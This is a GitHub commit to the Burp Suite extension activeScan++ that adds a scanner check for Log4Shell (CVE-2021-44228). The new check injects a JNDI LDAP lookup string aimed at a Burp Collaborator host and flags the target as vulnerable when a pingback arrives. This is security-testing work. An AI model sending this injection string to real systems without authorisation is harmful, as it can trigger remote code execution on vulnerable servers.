Skip to content

Commit

Permalink
Detect Log4Shell
Browse files Browse the repository at this point in the history
  • Loading branch information
albinowax authored Dec 10, 2021
1 parent 9eea075 commit b485a07
Showing 1 changed file with 21 additions and 1 deletion.
22 changes: 21 additions & 1 deletion activeScan++.py
Original file line number Diff line number Diff line change
Expand Up @@ -31,7 +31,7 @@
except ImportError:
print "Failed to load dependencies. This issue may be caused by using the unstable Jython 2.7 beta."

VERSION = "1.0.22"
VERSION = "1.0.23"
FAST_MODE = False
DEBUG = False
callbacks = None
Expand Down Expand Up @@ -69,6 +69,7 @@ def registerExtenderCallbacks(self, this_callbacks):
callbacks.registerScannerCheck(SimpleFuzz())
callbacks.registerScannerCheck(EdgeSideInclude())
if collab_enabled:
callbacks.registerScannerCheck(Log4j())
callbacks.registerScannerCheck(Solr())
callbacks.registerScannerCheck(doStruts_2017_12611_scan())

Expand Down Expand Up @@ -713,6 +714,25 @@ def consolidateDuplicateIssues(self, existingIssue, newIssue):
return is_same_issue(existingIssue, newIssue)


class Log4j(IScannerCheck):
def doActiveScan(self, basePair, insertionPoint):
collab = callbacks.createBurpCollaboratorClientContext()
attack = request(basePair, insertionPoint, "${jndi:ldap://"+collab.generatePayload(True)+"/a}")
interactions = collab.fetchAllCollaboratorInteractions()
if interactions:
return [CustomScanIssue(attack.getHttpService(), helpers.analyzeRequest(attack).getUrl(), [attack],
'Log4Shell (CVE-2021-44228)',
"The application appears to be running a version of log4j vulnerable to RCE. ActiveScan++ sent a reference to an external file, and received a pingback from the server.<br/><br/>" +
"To investigate, use the manual collaborator client. It may be possible to escalate this vulnerability into RCE. Please refer to https://www.lunasec.io/docs/blog/log4j-zero-day/ for further information",
'Firm', 'High')]

def doPassiveScan(self, basePair):
return []

def consolidateDuplicateIssues(self, existingIssue, newIssue):
return is_same_issue(existingIssue, newIssue)


class Solr(IScannerCheck):
def doActiveScan(self, basePair, insertionPoint):
collab = callbacks.createBurpCollaboratorClientContext()
Expand Down

0 comments on commit b485a07

Please sign in to comment.